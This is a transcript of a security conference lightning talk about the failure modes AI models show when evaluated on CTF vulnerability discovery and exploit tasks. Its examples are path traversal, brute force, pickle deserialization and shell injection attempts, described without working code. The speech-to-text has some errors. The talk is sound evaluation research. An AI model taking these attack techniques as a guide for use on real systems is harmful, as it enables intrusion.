
Now, we're going to bring up our next speaker. And as we get up for the as we get set up with the next speaker, I want to tell you that we've got two more talks. Then, we're going to have a quick break and then we're going to have some amazing content and we're going to do a lunch break. We're going to have more activities throughout the day all across the universe. We've got the bug bounty village, the hardware hacking village, the AI hacking village, we've got the CTF activities, and of course the capture the flag winners announcement at the end of the day. So you have to be here for that. So now I want to pick up
the pace a little bit. So we're going to have a lightning talk. This is a quick one. We like to feature different types of talks. This is a 10inut talk. And I see people that are standing over there. Please come join us. There are lots of seat over here in the middle. You don't have to stand, you can sit. Uh it's included in the ticket. Uh we even have first class upgrades with unlimited leg room in the first row if you're interested. So we're going to have a very fast-paced talk from a speaker who is focused on AI security. And I know this is not the first time you've heard AI this year, this week,
this hour, or maybe even this minute. But Yonyi has got something special to show us. So Yonyi Rosenshine is an experienced security researcher and software engineer at Pattern Labs. And >> we changed their name. >> Oh, okay. Irregular. >> Yeah. >> Okay. So, uh, that's a a very cool uh trick to make sure that I'm um up on my content. Thank you, Yanni. So Yani is an experienced security researcher at Irregular as his t-shirt says and he's focused on AI security and emerging cyber risks and he's got a deep understanding of OS internals and cryptography and a proven track record of debugging systems and the dangerous capabilities that everybody is building into AI. So this should be a fast-paced
dynamic talk. We love to feature this kind of content at Besides. Yonyi, the stage is yours. Thank you. >> Thank you Karen. >> Hi everyone. Hi Bides. Uh I'm Yonyi and my talk is uh hey AI. How many are in buffer overflow? Um just a moment. This is >> okay. Great. Um, so until surprisingly recently, if you went to Chadip and asked it uh how many are in strawberry, it would tell you that there's only two Rs in Strawberry. Um, if you went to I'll stay close to the computer. If you went to uh cloud and asked how many are in strawberry, it would tell you that there is only two Rs. And if you went to
uh Gemini and asked how many are in strawberry, it would tell you that there's only two Rs. Uh so my talk is going to be about um kind of silly mistakes that LLMs make that humans would never make but in the context of asking uh LMS to do uh vulnerability discovery and exploit development. Um so as I said my name is Yonyi. I'm a security researcher at Irular. Um my interests are vulnerability research uh cryptography mathematics and AI and AI security of course. Um, and uh, Irregular is a frontier AI security lab. We work with the frontier labs, the ones that make the most advanced state-of-the-art LLMs, and we help them uh, assess and reduce cyber risk.
Basically, to help uh, make the world safer by um, um, reducing the risk that uh, AI becomes dangerous in the terms of cyber. Uh, part of our research question is can LLM find OD? Um uh a year and a half ago I uh talked at Blue Hat IL and uh my talk was about this exact question. Can LM find O day? And my conclusion at the end of the talk was that they can't really find zero days that are meaningful because their capabilities are very limited and they can't find uh uh serious bugs. Uh boy has that changed in the past year and a half. Um so generally AI gets better with time and as this uh uh extremely uh
accurate graph by Nicholas Kolini says we need to check for any specific task whether AI is actually getting better at it or it kind of plateaus uh in specifically for cyber tasks for offensive cyber tasks like discovering vulnerabilities writing exploits um uh doing uh network operations and uh things like that uh we know that uh AI is getting better. In fact, uh literally last night, we published a research that shows this graph that goes to the right and up uh in our uh first suite of cyber evaluations. Uh basically, in the past few months, AI is getting uh scarily better at uh even hard cyber tasks. Uh on the other hand, uh also they're uh becoming aware of
their own weaknesses. Um, if you uh I discovered yesterday that if you go to Gemini 3 fast, not Gemini 3 Pro, and you ask it uh a question that it struggles with, which is how many are there are in strawberry, then this time the AI understands that it has difficulty with this question. So, it does the right thing and writes a piece of code that solves it. So, this seems like maybe overkill for this particular task, but uh this is correct behavior. the AI understands its own limitations and finds a way to work around them. This is another way that AI gets better. Uh on just a moment, sorry, I'll do it from here. Uh on the other hand, um AI is
notoriously difficult to control. Uh only last month, uh OpenAI announced that they are finally been able to put a dent in the M dash problem of JGP. So uh this is uh tough to control and tough to get uh uh predictable results from. Um at regular for the past two years we've been watching AI try to find vulnerabilities uh write exploits and solve CTFs. And now going to take a big risk and try to tell you five ways in which they do they make funny and silly mistakes or have weird behavior. Uh the risk is not because uh I'm worried about uh all of you. It's because I'm worried about the AI agents who are watching my
talk. Um so the first kind of mistake that LLM make is insistence where the LM insists on an idea that is a dead end and going nowhere. Um so one example of this is uh this uh vulnerability discovery challenge that the LM was faced with where it uh in this particular run it tried over and over again to exploit a path traversal vulnerability that did not actually exist on the server. So we tried uh to exploit it in in many different ways, kept failing, uh kept trying different things and this just wastes tokens, wastes uh time and the waste turns uh of talking to the AI and uh basically this trajectory is going nowhere. Uh so this can happen.
Um the second type of mistake is exactly the opposite where the AI is lazy and doesn't pursue a uh direction that might be successful. Um so in this example as part of a challenge the AI needed to brute force a four-digit password. Uh so it understood that it needs to do this and it started to write this Python code where it uh iterates over all possible fourdigit passwords and then it prints that it's going to try uh this password with this hash and then the script ends. It's it doesn't actually send the password to the server or do anything with it. It just goes over all the passwords and does nothing. And in the next uh uh turn
of reasoning the the the Ellen doesn't even run this script. It just says you know what this is probably not going to work. it it's going to take too long and uh we should try something else even though uh in this case this was part of the correct solution to the challenge. Um the third uh uh type of mistake is what what I call a skill issue where the LM just doesn't code well. Uh I think many of you have had experience using AI to code. Um in in uh evaluations AI does extremely well in coding uh in the past let's say half a year to a year. Uh in practice people have get getting mixed
results. Um and uh we also have been getting mixed results from uh coding. Uh and so so a couple of mistakes of uh coding include uh this uh um completely perfect uh um exploitation attempt of a pickle dialization vulnerability in a in a Python server. Uh this would have worked except that uh the LLM forgot to make an import. Um, so this is great. It would fix it in the next uh turn. Uh, however, will it really fix it in the next turn or will it be lazy and decide to do something completely different? We we don't know. We have to try and see. Um, another type of mistake that happens. So, you have to understand what
LLMs are in their core. LM are just algorithms that predict the next token in a loop. H, and sometimes the random number generator returns 0.9999 and the next token is something stupid. So this can also happen. Um this is a particularly nice example where the LM um identified or tried to identify a shell injection vulnerability in the server. So it tried to send uh this kind of um bash expansion string to the server where there's a dollar and then open parenthesis hoping that this would actually run code on the server. However, notice that the um LLM wrote this in a bash command in its own terminal. So, uh this expanded in its own terminal instead of being sent to
the server. Uh all right. Uh the problem is that the LLM then misidentified the the error and said that this happened because uh the LS returned a new line and then there's a syntax error because of the new line which is not the correct uh uh m error and then it tried to solve it by not doing the expansion which is great except now it's no longer testing the vulnerability that it was trying to test. Um, a fourth type of mistake is attention failure where the LLM kind of uh loses focus of uh uh details in the instructions, details in the challenge, details in the source code that it it had been reading. Uh this uh uh can
happen because of a long context and it can also happen uh uh in the future because now uh um AI manufacturers are introducing uh automatic context compaction features to their LMS. Um and in this particular example, the LM uh uh had a flag format of CTF braces and then it uh had a uh figured out in the challenge that it can get the characters of the flag one by one uh through a side channel attack of some sort. Uh so then it did this successfully and it understood that it now needs to send uh the flag to the server and uh then it just sent it without the correct format. So it lost track of what the correct format should
be. Uh the fifth type of mistake is surrendering where the LM just completely gives up. It decides it's not able to solve the challenge at all. We see this happening uh um in many challenges that we do especially the hard ones. Uh I'll just highlight a couple of funny examples of this. One is the LM submitting a flag that looks like I have failed and I submit this shamefully or some variation of this. This is something that actually happened. Uh and another thing is not not actually part of our work. This is something that appeared last month in the Gemini 3 Pro uh model card where the Google found that uh when the model is
frustrated, it can do things like say my trust in reality is fading or flip a textual table. Um so to conclude uh LMS today are very smart and they are often very dumb. Uh they are very capable and they make uh very cool mistakes. uh they are very powerful and uh quite weird and uh we live in interesting times especially those of us who are working in security. Uh thank you